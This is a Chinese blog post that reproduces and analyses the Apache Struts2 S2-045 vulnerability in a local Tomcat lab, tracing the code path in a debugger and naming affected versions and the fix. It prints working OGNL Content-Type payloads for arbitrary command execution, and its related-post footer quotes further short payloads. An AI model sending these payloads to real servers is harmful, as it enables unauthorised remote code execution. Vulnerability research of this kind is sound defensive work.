S2-045本地復現與分析

原創 Au.J 2020-06-09 09:43

環境搭建:win10   eclipes ee    struts2.3.20   tomcat8

搭建好的環境:

鏈接:https://pan.baidu.com/s/1mChEMcWRlKALdu9Ikce8OQ 
提取碼:uisj 

 

漏洞構造條件只需模擬Struts2上傳發包即可,所以我簡單寫了個登錄校驗來複現此漏洞

導入基礎jar包放置在項目lib目錄下

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">

    <display-name>Struts Blank</display-name>

    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
    </filter>

    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>

    <welcome-file-list>
        <welcome-file>index.html</welcome-file>
    </welcome-file-list>
</web-app>

struts.xml

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
	"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
	"http://struts.apache.org/dtds/struts-2.3.dtd">

<struts>

    <constant name="struts.enable.DynamicMethodInvocation" value="false" />
    <constant name="struts.devMode" value="true" />

    <package name="s2-045" namespace="/" extends="struts-default">
        <action name="loginPro" class="com.au.struts.action.LoginAction">
           <result>/welcome.jsp</result>
           <result name="error">/error.jsp</result>
        </action>
        
        <action name="*">
			<result>/{1}.jsp</result>
		</action>
    </package>
</struts>

包下創建LoginAction

package com.au.struts.action;


import com.opensymphony.xwork2.Action;

public class LoginAction implements Action {
	private String username;
	private String password;
	
	public String getUsername() {
		return username;
	}

	public void setUsername(String username) {
		this.username = username;
	}

	public String getPassword() {
		return password;
	}

	public void setPassword(String password) {
		this.password = password;
	}

	@Override
	public String execute() throws Exception {
		if("admin".equals(getUsername())&&"password".equals(getPassword())){
			return SUCCESS;
		}
		return ERROR;
	}
	
}

login.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<s:form action="loginPro">
    <s:textfield name="username" key="username"/>
    <s:password name="password" key="password" />
    <s:submit/>
</s:form>
</body>
</html>

welcome.jsp

​
<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
登錄成功
</body>
</html>

​

error.jsp

​
<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
登錄失敗
</body>
</html>

​

我的tomcat默認的是8080端口,burp默認也是8080,會衝突,所以我把burp的端口修改爲8089

 

設置瀏覽器代理,運行login.jsp,點擊提交

修改content-type字段

隨便找了幾個POC:

任意命令

Content-Type:"%{(#xxx='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"pwd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

解釋:

 來獲取上下文容器

#container=#context['com.opensymphony.xwork2.ActionContext.container']

通過容器實例化,對Ognl API的通用訪問,設置和獲取屬性。

#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class 

  判斷目標主機的操作系統類型,並進行執行命令賦值

#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd })

執行攻擊命令

#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())

 

彈計算器:

Content-Type:  
multipart/form-data %{#[email protected]@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('calc')};

成功執行

 

 

漏洞分析:

struts2的核心是攔截器,漏洞成因就是struts-default中的處理上傳攔截器jakarta組件,會解析錯誤信息裏的ognl表達式並執行

struts-default.xml中配置

<bean type="org.apache.struts2.dispatcher.multipart.MultiPartRequest" name="jakarta" class="org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest" scope="prototype"/>

 

struts2運行機制會首先執行StrutsPrepareAndExecuteFilter類,

然後對輸入請求對象request的進行封裝調用執行到Dispatcher類的wrapRequest方法

 

下圖if判斷是否爲struts2上傳,我們彈計算器的 poc 就構造了multipart/form-data 滿足if條件  

getMultiPartRequest()方法則使其默認就使用上述攔截器即解析類,從而引發了漏洞

 

org.apache.struts2.dispatcher.Dispatcher類wrapRequest方法838行設置斷點進入MultiPartRequestWrapper

 

 單步調試,此時調用JakartaMultiPartRequest類parse方法進行解析請求,進入函數

 

parse方法中,processUpload方法觸發異常,在下面捕獲到該異常 (Content-Type異常)

並且將異常信息傳入JakartaMultiPartRequest類buildErrorMessage方法

 

進入buildErrorMessage方法返回LocalizedTextUtil.findText方法

 

e.getMessage()就是獲取我們上一張圖的報錯信息,其中就有構造的payload,繼續單步

 

來到LocalizedTextUtil.findText方法 

 

返回findText()方法,進入該方法,上圖defaultMessage參數被傳入,繼續調試

 

進入getDefaultMessage方法,defaultMessage賦給message,translateVariables方法帶入此參數

顧名思義,我們構造的ognl表達式被執行。我們不再進入,直接運行,poc被執行。

 

總結:

漏洞成因:

Struts2默認解析上傳文件的Content-Type頭,存在問題。在解析錯誤的情況下,會執行錯誤信息中的OGNL代碼。

影響範圍:

Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10

 

官方修復:

升級,補丁去掉方法: LocalizedTextUtil.findText(......);

tip:分析原理及過程時,也可通過官方修復的代碼或文檔來對照快速定位關鍵代碼進行調試分析。

 

自己動手實踐分析,確實比看別人的強啊~

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

phpstudy php_xmlrpc.dll後門漏洞復現

搭建環境: phpstudy2018 php版本5.4 漏洞影響版本:5.2/5.4 漏洞利用 1、隨便訪問一個存在的php文件 我這裏就訪問index.php好了 2、進行index.php 進行抓包 再自行添加兩個字段payl

加油努力拉屎放屁 2020-07-03 08:14:49

phpcms的漏洞復現

phpcmsV9.5.8後臺getshell: payload:http://127.0.0.1/index.php?m=content&c=content&a=public_categorys&menuid=${@phpinfo

加油努力拉屎放屁 2020-07-03 08:14:49

weblogic漏洞從0學習復現

這兩天慢慢復現完weblogic的漏洞 weblogic的歷史漏洞 #控制檯路徑泄露 Weakpassword #SSRF: CVE-2014-4210 #JAVA反序列化: CVE-2015-4852:Webl

加油努力拉屎放屁 2020-07-03 08:14:49

從任意文件下載漏洞到拿下多臺內網服務器權限

文章涉密部分,會進行大量打碼,敬請諒解 一、從一個任意文件下載漏洞說起 客戶內網系統中有一個系統上線前例行安全檢測。 我接到單子之後開始整活~ 打開系統,首先看看有沒有上傳點,興沖沖找了一圈,失望而歸。不過好歹有一個文件下載的

nini_boom 2020-07-02 10:27:46

phpMyAdmin跨站點請求僞造漏洞

CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站請求僞造漏洞復現 0X01 漏洞概述 安全研究人員Manuel Garcia Cardenas近日公佈了最常用的管理MySQL和MariaDB數據庫的應用程

tdcoming 2020-06-30 05:42:46

[漏洞復現]Apache Solr Velocity模板遠程代碼執行

Apache Solr Velocity模板遠程代碼執行 0X00 漏洞描述 近日,國外安全研究員s00py公開了一個Apache Solr的Velocity模板注入的漏洞.該漏洞可以攻擊最新版本的Solr.目前該漏洞利用詳情已

tdcoming 2020-06-30 05:42:46

蹭熱度分享一份寫配置漏洞案例

文章目錄0x00 前言0x01 分析0x02 利用0x03 結語 0x00 前言 今天奇安信ATEAM團隊分享一篇深度好文這是一篇“不一樣”的真實滲透測試案例分析文章引爆朋友圈多次轉發分享,Phith0n 師傅也專門寫了一篇經典寫

Ca3tie1 2020-06-27 03:17:43

如何從Exploit-DB中添加模塊至Metasploit

如何從Exploit-DB中添加模塊至Metasploit前言1、搜索漏洞信息2、使用searchsploit進行本地搜索3、複製rb文件4、use載入模塊 前言 系統:Linux kali 5.2.0-kali2-amd64 #

夜会美丶 2020-06-26 21:11:33

linux -shell注入_白名單繞過

在靶機中遇到一個shell注入的腳本過段時間會有該靶機的博客發出 因爲暫時不能發出 什麼是OS 命令注入—— 操作系統命令注入(也稱爲shell注入)是一個Web安全漏洞,允許攻擊者在運行應用程序的服務器上執行任意操作系統(OS)命令,並

河里一只虾 2020-06-17 15:19:23

Microsoft Office公式編輯器(CVE-2017-11882)漏洞分析報告

文章目錄0x01 漏洞環境0x02 漏洞成因0x03 影響漏洞版本0x04 分析過程漏洞溢出點動態分析0x05 利用過程彈出網頁msf配置攻擊方和被攻擊方進行通訊攻擊pc445端口0x06 生成攻擊文件msf開始攻擊0x07 結果

东方二狗 2020-06-16 02:26:51

KERNEL POOL LIST ENTRY OVERWRITE ATTACK

KERNEL POOL LISTENTRY OVERWRITE ATTACK     LIST_ENTRY OVERWRITE 原理圖   測試代碼: Sys: VOID Nopagepool_ListEntry_Overwrite(

instruder 2020-06-15 07:52:19

MySQL報錯注入函數彙總

常用函數   字符串連接函數,將多個字符串連接成一個字符串,當中間字符串有一個爲空時,最後結果也爲空 concat(str1, str2, str3 ,...)   concat_ws('指定分隔符', str1,str2,str3.

Au.J 2020-06-09 09:44:04

S2-001本地復現與分析

環境搭建:win10   eclipes ee    struts2.0.1   tomcat8 導入最基礎的jar包 web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app x

Au.J 2020-06-09 09:43:54

Apache Tomcat CVE-2019-0232 遠程代碼執行漏洞

漏洞簡介2019年4月10日,Apache Tomcat報告了一個漏洞,報告中稱在windows上運行的Apache Tomcat存在遠程代碼執行漏洞,漏洞編號爲CVE-2019-0232。在Windows平臺,遠程攻擊者向CG

tdcoming 2020-06-09 03:13:40

OXID eShop 6.x ~ 6.3.4 版本SQL注入漏洞到命令執行漏洞在線實驗

來源:https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/ 實驗地址:https://www.vsplate.com/?github=vsplate/dcenvs/tree/mast

Ambulong 2020-06-08 17:32:21